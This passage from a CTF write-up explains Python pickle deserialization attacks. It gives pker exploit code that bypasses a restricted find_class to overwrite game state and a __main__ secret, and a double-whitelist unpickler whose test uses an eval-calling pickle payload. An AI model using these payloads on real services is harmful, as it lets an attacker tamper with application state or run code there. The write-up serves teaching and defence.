The challenge is a number-guessing game. Each round, the input is deserialized into a ticket and compared with a randomly generated ticket; the flag is awarded for 10 correct guesses. find_class restricts loading to the guess_game module and forbids double underscores (magic methods and variables):

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only allow safe classes
        if "guess_game" == module[0:10] and "__" not in name:
            return getattr(sys.modules[module], name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

Cheat directly: use pickle to set game.curr_ticket to the ticket we submit, and set both win_count and round_count to 9 (one more round is still played after deserialization: the win-or-lose check is only made once the rounds are used up, and the flag is awarded when win_count equals 10). The pker code:

ticket=INST('guess_game.Ticket','Ticket',(1))
game=GLOBAL('guess_game','game')
game.win_count=9
game.round_count=9
game.curr_ticket=ticket

return ticket

Colleges and Universities Fighting Epidemic Network Security Sharing Competition: webtmp
For the analysis, see the hand-written opcode walkthrough in the CTF combat section above. The pker code is:

secret=GLOBAL('__main__','secret') # the executed Python file is treated as the __main__ module, and secret is an attribute of it
secret.name='1'
secret.category='2'
animal = INST('__main__','Animal','1','2')
return animal

 

Summary:
To address pickle deserialization issues, the official recommendation is to override Unpickler.find_class() and introduce a whitelist, together with a warning: be careful about which objects you allow to be deserialized. For developers, if users really must be allowed to supply data for deserialization, it is best to use a double whitelist that restricts both module and name, and to consider carefully whether the whitelisted modules and functions are dangerous.
In CTFs, pickle challenges generally test a deep understanding of Python itself (magic methods, attributes and so on), and the exploitation can be very clever.
Because pickle "can only assign values, not look them up", the only operation that can look something up by key is find_class, i.e. opcodes such as c and i. Finding a way in through particular magic methods and attributes is the key; functions such as getattr and get are used a lot during exploitation.
pker makes it much more convenient to write pickle opcode and is a powerful tool for solving these challenges.
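As a sketch of the double whitelist mentioned above, the unpickler below checks the module and the name together. The ALLOWED table, the class name and the helper restricted_loads are assumptions made for this example; a real whitelist has to be reviewed entry by entry.

```python
import io
import pickle

# Hypothetical whitelist: module name -> names allowed from that module.
ALLOWED = {
    "builtins": {"range", "complex", "set", "frozenset", "slice"},
}

class DoubleWhitelistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Both the module and the name must be listed explicitly.
        if name in ALLOWED.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data):
    """Load pickle data through the double whitelist."""
    return DoubleWhitelistUnpickler(io.BytesIO(data)).load()

allowed_result = restricted_loads(pickle.dumps(range(3)))

try:
    restricted_loads(b"cbuiltins\neval\n(S'1+1'\ntR.")
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(allowed_result, blocked)
```

Names such as getattr are deliberately left out: as the challenges above show, a single lookup helper on the whitelist is enough to reach everything else.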
